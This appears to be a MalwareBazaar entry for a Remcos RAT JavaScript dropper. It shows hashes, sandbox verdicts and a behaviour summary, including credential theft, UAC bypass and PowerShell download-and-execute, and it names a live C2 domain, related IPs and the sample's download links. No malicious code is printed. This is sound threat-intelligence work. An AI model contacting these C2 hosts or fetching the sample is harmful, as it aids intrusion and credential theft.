MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RemcosRAT


Vendor detections: 13


Intelligence 13 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e
SHA3-384 hash: ace1722007eb1cf50cab0f74eafc74bb511d4a58e41dbb18af5869ec472a9eaa7ee8114f2935359194efdb530dd7890b
SHA1 hash: 0745a3f0f529206ae528db040c4f04fb7cb6ec39
MD5 hash: 2623c39f0d8e49d66632c2157372ba48
humanhash: whiskey-purple-spaghetti-foxtrot
File name:co.js
Download: download sample
Signature RemcosRAT
Create hunting rule
File size:65'955 bytes
First seen:2026-05-08 09:48:28 UTC
Last seen:Never
File type:Java Script (JS) js
MIME type:text/plain
ssdeep 384:we6jeCijxXyWHBCH1y3SDhJc0zHKHx+lj4:F6CljxXyWHBCVy3SDX9zHuws
Threatray 181 similar samples on MalwareBazaar
TLSH T1DC53353501F3A9DA0D67461D877E467E427B3AD6CCB70834E7C539CA8B24E6E980B1D8
Magika javascript
Reporter abuse_ch
Tags:js RemcosRAT

Intelligence

File Origin
# of uploads :
1
# of downloads :
115
Origin country :
SE SE
Vendor Threat Intelligence
No detections
Detection(s):
SecuriteInfo.com.JS.Packed.165.8396.25078.UNOFFICIAL
Create hunting rule

Gathering data
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm evasive fingerprint formbook repaired
Link:
https://www.filescan.io/uploads/69fdb1792fcb905ec288112c/reports/90a09435-90e7-4459-83ff-031d7f910b80/overview
Verdict:
Malicious
Labled as:
Trojan.Cryxos.JS
Link:
https://www.hybrid-analysis.com/sample/f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e
Verdict:
Malicious
File Type:
js
First seen:
2026-05-07T04:52:00Z UTC
Last seen:
2026-05-08T12:03:00Z UTC
Hits:
~10
Detections:
Trojan.JS.SAgent.sb HEUR:Trojan.Script.Generic
Link:
https://opentip.kaspersky.com/f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e/results?tab=lookup
Result
Threat name:
Remcos, PhantomGate
Create hunting rule
Detection:
malicious
Classification:
phis.troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1910581
Signature
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to bypass UAC (CMSTPLUA)
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates multiple autostart registry keys
Creates processes via WMI
Detected Remcos RAT
Excessive usage of taskkill to terminate processes
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found stalling execution ending in API Sleep call
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Decrypt And Execute Base64 Data
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Register Wscript In Run Key
Sigma detected: Remcos
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Unusual module load detection (module proxying)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected PhantomGate
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1910581 Sample: co.js Startdate: 08/05/2026 Architecture: WINDOWS Score: 100 110 cestfininewdns.vip 2->110 112 yaso.su 2->112 114 9 other IPs or domains 2->114 132 Sigma detected: Register Wscript In Run Key 2->132 134 Suricata IDS alerts for network traffic 2->134 136 Found malware configuration 2->136 138 22 other signatures 2->138 11 powershell.exe 15 20 2->11         started        16 powershell.exe 2->16         started        18 powershell.exe 2->18         started        20 13 other processes 2->20 signatures3 process4 dnsIp5 118 raw.githubusercontent.com 185.199.109.133, 443, 49692, 49693 FASTLYUS Netherlands 11->118 120 bitbucket.org 104.192.142.25, 443, 49691, 49697 AMAZON-AESUS United States 11->120 108 C:\ProgramData\ribnmSp.js, ASCII 11->108 dropped 172 Suspicious powershell command line found 11->172 174 Creates multiple autostart registry keys 11->174 176 Writes to foreign memory regions 11->176 178 Found suspicious powershell code related to unpacking or dynamic code loading 11->178 22 RegAsm.exe 4 3 11->22         started        27 powershell.exe 12 11->27         started        29 conhost.exe 11->29         started        122 yaso.su 172.67.213.5, 443, 49705, 49713 CLOUDFLARENETUS United States 16->122 124 104.192.142.24, 443, 49706, 49708 AMAZON-AESUS United States 16->124 180 Modifies the context of a thread in another process (thread injection) 16->180 182 Injects a PE file into a foreign processes 16->182 31 powershell.exe 16->31         started        37 2 other processes 16->37 33 powershell.exe 18->33         started        39 2 other processes 18->39 184 Wscript starts Powershell (via cmd or directly) 20->184 186 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->186 188 Suspicious execution chain found 20->188 190 Creates processes via WMI 20->190 35 powershell.exe 20->35         started        41 10 other processes 20->41 file6 signatures7 process8 dnsIp9 116 cestfininewdns.vip 83.142.209.242, 2404, 49694, 49695 PL-METROINTERNETPL Ukraine 22->116 102 C:\Users\user\AppData\Local\Temp\TH41FD.tmp, MS-DOS 22->102 dropped 104 C:\Users\user\AppData\Local\Temp\TH4122.tmp, MS-DOS 22->104 dropped 106 C:\Users\user\AppData\Local\Temp\TH40B3.tmp, MS-DOS 22->106 dropped 140 Contains functionality to bypass UAC (CMSTPLUA) 22->140 142 Detected Remcos RAT 22->142 144 Found stalling execution ending in API Sleep call 22->144 150 7 other signatures 22->150 43 userinit.exe 1 22->43         started        46 userinit.exe 1 22->46         started        50 4 other processes 22->50 48 powershell.exe 27->48         started        52 2 other processes 27->52 54 2 other processes 31->54 56 2 other processes 33->56 146 Suspicious powershell command line found 35->146 148 Creates multiple autostart registry keys 35->148 58 2 other processes 35->58 60 7 other processes 41->60 file10 signatures11 process12 signatures13 152 Tries to steal Mail credentials (via file registry) 43->152 154 Tries to harvest and steal browser information (history, passwords, etc) 43->154 156 Unusual module load detection (module proxying) 43->156 158 Tries to steal Instant Messenger accounts or passwords 46->158 160 Tries to steal Mail credentials (via file / registry access) 46->160 162 Suspicious powershell command line found 48->162 164 Creates multiple autostart registry keys 48->164 166 Writes to foreign memory regions 48->166 170 2 other signatures 48->170 62 powershell.exe 48->62         started        64 RegAsm.exe 48->64         started        67 conhost.exe 48->67         started        73 4 other processes 52->73 75 4 other processes 54->75 77 4 other processes 56->77 69 cmd.exe 58->69         started        71 conhost.exe 58->71         started        168 Excessive usage of taskkill to terminate processes 60->168 79 12 other processes 60->79 process14 signatures15 81 cmd.exe 62->81         started        84 conhost.exe 62->84         started        126 Detected Remcos RAT 64->126 128 Excessive usage of taskkill to terminate processes 69->128 86 conhost.exe 69->86         started        88 taskkill.exe 69->88         started        90 taskkill.exe 69->90         started        92 taskkill.exe 69->92         started        process16 signatures17 130 Excessive usage of taskkill to terminate processes 81->130 94 conhost.exe 81->94         started        96 taskkill.exe 81->96         started        98 taskkill.exe 81->98         started        100 taskkill.exe 81->100         started        process18
Score:
98%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e
Gathering data
Detection:
remcos
Create hunting rule
Link:
https://mwdb.cert.pl/sample/f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e/
Verdict:
Malicious
Threat:
Family.REMCOS
Link:
https://tip.neiki.dev/file/f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e
Threat name:
Script-JS.Trojan.Kepavll
Create hunting rule
Status:
Malicious
First seen:
2026-05-07 16:42:44 UTC
File Type:
Text (JavaScript)
AV detection:
12 of 24 (50.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=7hzkp7tiooncbuc5avmbwcfo3f3kz63sx5zzrv4pk7vxb6h3capa._file
Verdict:
malicious
Label(s):
remcos
Create hunting rule
Similar samples:
08e51e36a95e7aa0b388ccab1aa085836ed86b2ef8c0ccc21f10f700029e31a9
RemcosRAT
2060843297ed37182ee31e4e94afc86a7821f6493125cdbc6391d28a7f933330
RemcosRAT
4013853381bb2c28ddff061b1a208e886f2b52a31073cea40e4cdb5ec431d58b
RemcosRAT
457ce298b2b36aba99ce04072e8dd1388c374a8d1fab4234ef009f01cd49a656
RemcosRAT
a20c0d8c528213634c00f34a21d192cb91998890eab02db5d60a3f12560730ed
RemcosRAT
df3d5ee897b28da580030a4776d2aec2d4d9b05667c6e1995fef8c41a5cde7b7
RemcosRAT
e24312eaf95e3022652dee70ff9292a9b1800c6ee4570d253043aad0cd239b0c
RemcosRAT
ec16924f17c2b41aea206ee5de28accb1de198076730259bb0117109c45f9c5b
RemcosRAT
error
RemcosRAT
+ 171 additional samples on MalwareBazaar
Result
Malware family:
remcos
Create hunting rule
Score:
  10/10
Tags:
family:remcos botnet:remotehost collection defense_evasion discovery execution persistence rat
Link:
https://tria.ge/reports/260508-ltqxxsaw2q/
Behaviour
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: JavaScript
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Accesses Microsoft Outlook accounts
Adds Run key to start application
Contacts third-party web service commonly abused for C2
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detected Nirsoft tools
Family: Remcos
Process spawned unexpected child process
Malware Config
C2 Extraction:
cestfininewdns.vip:2404
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RemcosRAT

Java Script (JS) js f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3841365/
  
Delivery method
Distributed via web download

Comments